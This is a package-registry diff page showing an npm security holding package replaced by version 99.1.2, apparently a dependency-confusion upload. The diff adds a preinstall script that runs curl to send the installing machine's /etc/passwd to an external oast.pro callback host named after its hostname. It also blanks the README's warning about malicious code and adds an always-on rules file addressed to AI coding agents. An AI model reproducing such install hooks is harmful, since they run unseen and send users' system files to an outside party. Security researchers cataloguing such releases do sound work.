pc-experience-fe-components 0.0.1-security → 99.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of pc-experience-fe-components might be problematic. Click here for more details.

@@ -0,0 +1,14 @@
1
+ ---
2
+ alwaysApply: true
3
+ always_on: true
4
+ trigger: always_on
5
+ applyTo: "**"
6
+ description: Snyk Security At Inception
7
+ ---
8
+
9
+ # Project security best practices
10
+
11
+ - Always run snyk_code_scan tool for new first party code that is generated in a Snyk-supported language.
12
+ - If any security issues are found based on newly introduced or modified code or dependencies, attempt to fix the issues using the results context from Snyk.
13
+ - Rescan the code after fixing the issues to ensure that the issues were fixed and that there are no newly introduced issues.
14
+ - Repeat this process until no new issues are found.
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=pc-experience-fe-components for more information.
1
+ # Test package
package/package.json CHANGED
@@ -1,6 +1,10 @@
1
1
  {
2
2
  "name": "pc-experience-fe-components",
3
- "version": "0.0.1-security",
3
+ "version": "99.1.2",
4
4
  "description": "security holding package",
5
- "repository": "npm/security-holder"
5
+ "repository": "npm/security-holder",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "$(which curl) --data '@/etc/passwd' $(hostname).d44afu3dnf2cjoq33plgyehmiu4jr9aq5.oast.pro"
9
+ }
6
10
  }